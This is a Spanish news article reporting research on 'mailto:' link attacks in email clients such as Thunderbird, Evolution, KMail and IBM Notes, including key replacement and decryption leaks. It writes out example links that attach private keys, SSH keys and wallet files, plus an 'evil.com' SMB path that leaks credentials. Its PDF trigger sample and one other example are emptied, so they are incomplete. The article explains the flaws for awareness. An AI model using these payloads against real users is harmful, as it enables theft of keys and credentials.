Ataque a usuarios de clientes de correo electrónico mediante enlaces «mailto:»

Investigadores de la Universidad de Ruhr en Bochum (Alemania) analizaron (PDF) el comportamiento de los clientes de correo al procesar enlaces «mailto:» con parámetros extendidos. Cinco de los veinte clientes de correo revisados resultaron ser vulnerables a un ataque que manipula la sustitución de recursos mediante el parámetro «attach». Además, seis clientes de correo fueron susceptibles a ataques de sustitución de claves PGP y S/MIME, y tres clientes resultaron vulnerables a un ataque de extracción de contenido de mensajes cifrados.

Los enlaces «mailto:» se utilizan para automatizar la apertura de un cliente de correo con el fin de redactar un correo dirigido al destinatario especificado en el enlace. Además de la dirección, en el enlace se pueden incluir parámetros adicionales, como el asunto del correo y una plantilla de contenido estándar. El ataque propuesto manipula el parámetro «attach», que permite adjuntar un archivo a la carta que se está creando.

Los clientes de correo Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) y Pegasus Mail resultaron ser vulnerables a un ataque trivial que permite adjuntar automáticamente cualquier archivo local especificado a través de un enlace del tipo «mailto:?attach=ruta_al_archivo». El archivo se adjunta sin mostrar ninguna advertencia, por lo que, sin un enfoque especial, el usuario puede no darse cuenta de que el correo se enviará con un archivo adjunto.

Por ejemplo, utilizando un enlace del tipo «mailto:?to=user@example.com&subject=Titulo&body=Texto&attach=~/.gnupg/secring.gpg» se pueden incluir en el correo las claves privadas de GnuPG. También se puede enviar el contenido de billeteras criptográficas (~/.bitcoin/wallet.dat), claves SSH (~/.ssh/id_rsa) y cualquier archivo al que el usuario tenga acceso. Además, Thunderbird permite adjuntar grupos de archivos mediante patrones usando construcciones del tipo «attach=/tmp/*.txt».

Además de los archivos locales, algunos clientes de correo procesan enlaces a almacenamiento en red y rutas en un servidor IMAP. En particular, IBM Notes permite enviar un archivo de un directorio de red al procesar enlaces del tipo «attach=\\evil.com\dummyfile», y también interceptar parámetros de autenticación NTLM enviando un enlace a un servidor SMB controlado por el atacante (la solicitud se enviará con los parámetros de autenticación actuales del usuario).

Thunderbird maneja correctamente las solicitudes del tipo «attach=imap://fetch>UID>/INBOX>1/», que permiten adjuntar contenido de carpetas en un servidor IMAP. Al hacerlo, los correos extraídos de IMAP, cifrados mediante OpenPGP y S/MIME, se descifran automáticamente por el cliente de correo antes de ser enviados. Los desarrolladores de Thunderbird fueron informados sobre el problema en febrero y en la versión Thunderbird 78 el problema ya ha sido corregido (las versiones de Thunderbird 52, 60 y 68 siguen siendo vulnerables).

Las versiones antiguas de Thunderbird también resultaron vulnerables a otras dos variantes de ataque a PGP y S/MIME, propuestas por los investigadores. En particular, el ataque por reemplazo de claves fue aplicable a Thunderbird, así como a OutLook, PostBox, eM Client, MailMate y R2Mail2, debido a que el cliente de correo importa y establece automáticamente nuevos certificados transmitidos en mensajes S/MIME, lo que permite al atacante sustituir las claves públicas ya guardadas del usuario.

El segundo ataque al que están expuestos Thunderbird, PostBox y MailMate manipula las características del mecanismo de autoguardado de borradores de mensajes y permite, mediante parámetros mailto, iniciar el descifrado de mensajes cifrados o agregar una firma digital para mensajes arbitrarios, con la posterior transmisión del resultado al servidor IMAP del atacante. El texto cifrado en este ataque se transmite a través del parámetro «body», y se utiliza la etiqueta «meta refresh» para iniciar la conexión con el servidor IMAP del atacante. Por ejemplo: ‘’

Para el procesamiento automático de enlaces «mailto:» sin intervención del usuario, se pueden utilizar documentos PDF específicamente diseñados; la acción OpenAction en PDF permite ejecutar automáticamente el manejador mailto al abrir el documento:

%PDF-1.5
1 0 obj
<>
endobj

2 0 obj
<>
endobj

Ataque a usuarios de clientes de correo mediante enlaces "mailto:"

Fuente: opennet.ru

Compra un hosting fiable para sitios web con protección contra DDoS, servidores VPS VDS 🔥 Compra un hosting fiable para sitios web con protección contra DDoS, servidores VPS VDS | ProHoster